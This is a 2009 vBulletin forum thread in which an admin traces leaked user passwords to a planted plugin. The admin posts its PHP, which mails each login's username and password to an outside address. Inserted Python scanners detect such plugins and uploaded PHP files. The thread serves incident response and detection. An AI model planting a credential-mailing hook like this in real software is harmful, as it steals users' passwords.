help a script is sending my user passwords to an email
msimen
11-06-2009, 04:57 PM
Hello, please can you help me solve this problem? I found many emails queued on my server when I stopped postfix. The emails contain the username and correct password of many logged-in users. I cleaned many files, but the emails are still being sent. I don't know where the script is or how to stop it. Please help.
SVTCobraLTD
11-06-2009, 05:06 PM
Disable your products and contact vB support.
msimen
11-06-2009, 05:10 PM
I disabled all products and cleaned all garbage, still the same problem.
snakes1100
11-06-2009, 05:47 PM
ps ax | more
Check what processes are running; anything typical like ./name, kill it. Find the scripts on the server and remove them. My guess is you're already too late anyway and your server is probably compromised. I would shut the forum down as well as kill apache/php, as well as postfix.
Upgrade your server backend as well.
TNCclubman
11-06-2009, 05:50 PM
Aren't the passwords encrypted? They're not stored in their native text anywhere, even in the database.
snakes1100
11-06-2009, 05:53 PM
@tnc, that is true, but that is changeable.
msimen
11-06-2009, 06:10 PM
Yes, the passwords and the usernames are clear, not encrypted. Here is an example:
From www-data@host.xxxxx.com (www-data)
To xxxxxx@windowslive.com
Date Fri, 6 Nov 2009 20:02:49 +0100 (CET)
Subject Victim
username: username
Password: clear password
########
I found a file in avatars named avatar662.php and the code is encrypted there,
and another file in the attachments, but not sure if it's
Here is the text:
-- the 'correct' password
real_password = "password";
-- prompt the user to enter a password
user_password = Dialog.PasswordInput("Password", "Please enter the password: ", MB_ICONQUESTION);
-- compare the user's password to the 'correct' password.
-- If the user supplies the wrong password, exit the program.
if real_password ~= user_password then
Application.Exit();
end
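Added example (not part of the original thread, and not vBulletin code): a scan of upload directories such as the avatars and attachments folders mentioned above, flagging files that carry a script extension or a PHP open tag. The extension list, the function names and the demo tree are assumptions made for this sketch; the file contents are constructed placeholders.

```python
import os
import tempfile

# Extensions a web server may execute; an assumption, adjust to the server's handlers.
SCRIPT_EXT = {".php", ".phtml", ".php3", ".php4", ".php5", ".pl", ".cgi"}

def suspicious_uploads(root, head_bytes=4096):
    """Return [(relative_path, reasons)] for files that should never sit in an upload dir."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            reasons = []
            if os.path.splitext(name)[1].lower() in SCRIPT_EXT:
                reasons.append("script extension")
            # Also catch PHP hidden behind an image extension.
            with open(path, "rb") as fh:
                if b"<?php" in fh.read(head_bytes).lower():
                    reasons.append("php open tag")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def build_demo_tree():
    """Constructed sample tree; file contents are harmless placeholders."""
    root = tempfile.mkdtemp(prefix="uploads-demo-")
    samples = {
        ("avatars", "avatar12.gif"): b"GIF89a" + b"\x00" * 32,
        ("avatars", "avatar662.php"): b"<?php /* placeholder */ ?>",
        ("attachments", "notes.gif"): b"GIF89a<?PHP /* placeholder */ ?>",
    }
    for (folder, name), data in samples.items():
        os.makedirs(os.path.join(root, folder), exist_ok=True)
        with open(os.path.join(root, folder, name), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for rel, reasons in suspicious_uploads(build_demo_tree()):
        print(rel, "->", ", ".join(reasons))
```

Anything this reports is a lead for manual review; keep a copy of each file as evidence before deleting it.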
TNCclubman
11-06-2009, 06:24 PM
What mods do you have installed?
msimen
11-06-2009, 07:03 PM
I removed all mods, still the same problem. Where is the script sending that!!
TNCclubman
11-06-2009, 08:17 PM
What were the mods? The fact you removed them means nothing if that's how they got in.
Marco van Herwaarden
11-07-2009, 09:45 AM
Could it be that this script somehow gives an extra login prompt (fake) and that your users are actually entering their info in there?
Save all your files and database.
Disable and remove (all files!!) all modifications
Disable all your styles and create a new style with no parent (= default style) and set this to be the only style to be used on your board.
Check for modified files using AdminCP -> Maintenance -> Suspect file
Contact vBulletin support for assistance.
project-Buckfas
11-07-2009, 09:58 AM
This happened on a vB board I'm a member of a few weeks ago. The server was compromised and a harvesting script that prompted usernames and passwords to be entered was planted on the homepage.
These were logged to a txt file and later published online with everyone's usernames and passwords.
The amount of times a member tried to login was how many times they appeared on the list in the txt file.
This is the reason why your username/passwords are in plain text format. They remain encrypted in the database.
Get in touch with your host and shut down everything. When you're back up, make every user change their password.
msimen
11-07-2009, 02:21 PM
Found and solved.
Here is what I found in some plugins!
just a mod but tell me please if this
These are the plugins added:
member_complete
vb-sec2 login_verify_success
vb-sec3 global_setup_complete
vb-sec4 misc_start
and this is the content of the vb-sec2
$message = "username: " . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "\nPassword:". $vbulletin->db->escape_string(htmlspecialchars_uni($password));
mail('XXXXX@windowslive.com', 'Victim', $message);
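Added example (not part of the original thread, and not vBulletin code): a small audit that walks exported plugin records and reports any plugin whose PHP passes data derived from `$password` to an outbound sink such as `mail()`, following simple assignments like the `$message` line above. The record field names, the sink list and the second sample plugin are assumptions constructed for this sketch.

```python
import re

SINKS = ("mail", "fwrite", "fputs", "file_put_contents", "curl_setopt", "fsockopen")
SEEDS = {"$password"}  # credential variable used by the vb-sec2 plugin shown above
VAR = re.compile(r"\$[A-Za-z_]\w*")
ASSIGN = re.compile(r"^\s*(\$[A-Za-z_]\w*)\s*\.?=(?!=)(.*)$", re.S)
SINK_CALL = re.compile(r"\b(%s)\s*\((.*)\)" % "|".join(SINKS), re.S)

def credential_sinks(phpcode):
    """Return [(sink, tainted_vars)] for sink calls that receive credential data."""
    tainted = set(SEEDS)
    hits = []
    # Naive statement split: adequate for short plugin bodies, not a PHP parser.
    for stmt in phpcode.split(";"):
        m = ASSIGN.match(stmt)
        if m and tainted & set(VAR.findall(m.group(2))):
            tainted.add(m.group(1))  # taint flows through the assignment
        call = SINK_CALL.search(stmt)
        if call:
            used = tainted & set(VAR.findall(call.group(2)))
            if used:
                hits.append((call.group(1), sorted(used)))
    return hits

def audit(plugins):
    """plugins: dicts with title, hookname, phpcode (assumed export field names)."""
    return [(p["title"], p["hookname"], sink, used)
            for p in plugins
            for sink, used in credential_sinks(p["phpcode"])]

SAMPLE_PLUGINS = [
    # Plugin body as posted in the thread (address already redacted there).
    {"title": "vb-sec2", "hookname": "login_verify_success", "phpcode": r'''
$message = "username: " . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "\nPassword:". $vbulletin->db->escape_string(htmlspecialchars_uni($password));
mail('XXXXX@windowslive.com', 'Victim', $message);'''},
    # Constructed benign plugin: sends mail, but nothing derived from $password.
    {"title": "constructed-benign", "hookname": "misc_start", "phpcode": r'''
$subject = "Page viewed";
mail($adminaddress, $subject, "misc.php was opened");'''},
]

if __name__ == "__main__":
    for row in audit(SAMPLE_PLUGINS):
        print(row)
```

The check only follows direct variable assignments, so obfuscated or encoded plugin code still needs manual review.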
JamesC70
11-07-2009, 02:50 PM
Found and solved.
Here is what I found in some plugins!
just a mod but tell me please if this
These are the plugins added:
We'd still like to know which mod did this. Please check in Plugin Manager... above those files listed above, there should be a Product: name.
Write down the product name, then go into Manage Products and find that product on the list.
If the product's name is underlined, then it's clickable. Hover your mouse over that name, right-click, and select Copy Shortcut. Then come back here and paste the link. This will tell us if the product was released on vb.org, or if it came from somewhere else.
If the product's name is not underlined, then copy and paste the name, version, and description into your reply here.
If the product's name does not show on Manage Products, then return to Plugin Manager and screenshot the listings, and post your screenshots as a reply here. Maybe someone else is familiar with the product and can identify it.
It is very important that you let us know which modification did this. vb.org can pull the mod, check the code, and if vb.org sees the code that you have posted above they can notify other forums who have downloaded the mod, warning them not to use it.
Marco van Herwaarden
11-09-2009, 08:01 AM
The above script can only send out real passwords if your config.php file is set to send plain text passwords to the server. On a default installation plain text passwords are hashed on the client side and never even sent to the server. It is strongly recommended, the proof is in this thread, not to allow unhashed passwords to be sent to the server.